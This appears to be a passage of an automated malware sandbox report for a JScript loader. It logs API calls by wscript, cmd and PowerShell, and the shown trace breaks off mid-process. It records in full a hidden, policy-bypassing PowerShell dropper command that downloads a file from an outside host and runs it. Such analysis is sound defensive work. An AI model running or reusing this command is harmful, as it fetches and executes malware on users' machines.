System	Get Time	type = System Time, time = 2019-07-26 16:46:31 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 159058	1	Fn
System	Get Time	type = Performance Ctr, time = 21336999126	1	Fn
Module	Get Handle	module_name = c:\windows\system32\wscript.exe, base_address = 0xff6b0000	2	Fn
System	Get Info	type = Operating System	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Enabled, data = 103, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = LogSecuritySuccesses, data = 0, type = REG_NONE	1	Fn
Module	Load	module_name = kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x7705c4a0	1	Fn
Module	Get Filename	module_name = c:\windows\system32\wscript.exe, process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = IgnoreUserSettings, data = 0, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = TrustPolicy, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = UseWINSAFER, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 1, type = REG_SZ	1	Fn
Registry	Create Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = Timeout, data = 80, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings, value_name = DisplayLogo, data = 49, type = REG_NONE	1	Fn
System	Sleep	duration = -1 (infinite)	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\.js	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\.js, data = JSFile, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine	1	Fn
Registry	Read Value	reg_name = HKEY_CLASSES_ROOT\JSFile\ScriptEngine, data = JScript, type = REG_SZ	1	Fn
COM	Create	interface = 00000000-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:32 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 160103	1	Fn
System	Get Time	type = Performance Ctr, time = 21442374941	1	Fn
Module	Load	module_name = ADVAPI32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegisterTraceGuidsA, address_out = 0x7717f570	1	Fn
Module	Get Filename	process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExA, address_out = 0x7fefd72b5f0	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features	1	Fn
Registry	Read Value	value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7fefd730710	1	Fn
Module	Get Handle	module_name = c:\windows\system32\ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoGetObjectContext, address_out = 0x7fefea4c920	1	Fn
Module	Load	module_name = ole32.dll, base_address = 0x7fefea30000	1	Fn
Module	Get Address	module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7fefea57490	1	Fn
COM	Create	interface = 00000146-0000-0000-C000-000000000046, cls_context = CLSCTX_INPROC_SERVER	1	Fn
Environment	Get Environment String	name = JS_PROFILER	1	Fn
COM	Create	interface = 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = Ticks, time = 160119	2	Fn
File	Create	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
Module	Create Mapping	module_name = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304	1	Fn
Module	Map	C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Unmap	process_name = c:\windows\system32\wscript.exe	1	Fn
System	Get Info	type = System Directory, result_out = lô/	1	Fn
System	Get Info	type = System Directory, result_out = C:\Windows\system32	1	Fn
Module	Load	module_name = C:\Windows\system32\advapi32.dll, base_address = 0x7fefd710000	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferIdentifyLevel, address_out = 0x7fefd72e470	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0	1	Fn
Module	Get Address	module_name = c:\windows\system32\advapi32.dll, function = SaferCloseLevel, address_out = 0x7fefd72f660	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:32 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 160166	1	Fn
System	Get Time	type = Performance Ctr, time = 21448825820	1	Fn
System	Get Info	type = Operating System	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, type = size	1	Fn
File	Read	filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, size = 19304, size_out = 19304	1	Fn Data
COM	Create	interface = E4D1C9B0-46E8-11D4-A2A6-00104BD35090, cls_context = CLSCTX_INPROC_SERVER	1	Fn
System	Get Time	type = System Time, time = 2019-07-26 16:46:32 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 160384	1	Fn
System	Get Time	type = Performance Ctr, time = 21470557661	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
System	Get Time	type = Ticks, time = 162085	1	Fn
System	Get Time	type = Ticks, time = 162100	7	Fn
System	Get Time	type = Ticks, time = 162116	12	Fn
System	Get Time	type = Ticks, time = 162537	8	Fn
System	Get Time	type = Ticks, time = 162553	4	Fn
System	Get Time	type = Ticks, time = 162568	4	Fn
System	Get Time	type = Ticks, time = 162880	3	Fn
System	Get Time	type = Ticks, time = 162896	1	Fn
System	Get Time	type = Ticks, time = 162911	1	Fn
System	Get Time	type = Ticks, time = 163145	3	Fn
System	Sleep	duration = -1 (infinite)	1	Fn

Thread 0x4d8

1

0

»

Category	Operation	Information	Success	Count	Logfile
Window	Create	class_name = WSH-Timer, wndproc_parameter = 1661536		1	Fn

Process #26: cmd.exe

61

0

»

Information	Value
ID	#26
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:30, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:55

OS Process Information

»

Information	Value
PID	0x4fc
Parent PID	0xb14 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B5C

Threads

Thread 0xb5c

61

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:46:34 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 162615	1	Fn
System	Get Time	type = Performance Ctr, time = 21692816071	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xc4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #27: powershell.exe

294

0

»

Information	Value
ID	#27
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:32, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:52

OS Process Information

»

Information	Value
PID	0xc4
Parent PID	0x4fc (c:\windows\system32\cmd.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 614 0x 908 0x 5C8 0x B98 0x 820 0x 40C 0x D08

Threads

Thread 0x614

260

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Read	size = 4096, size_out = 4096	5	Fn Data
File	Read	size = 4096, size_out = 2530	1	Fn Data
File	Read	size = 542, size_out = 0	1	Fn
File	Read	size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
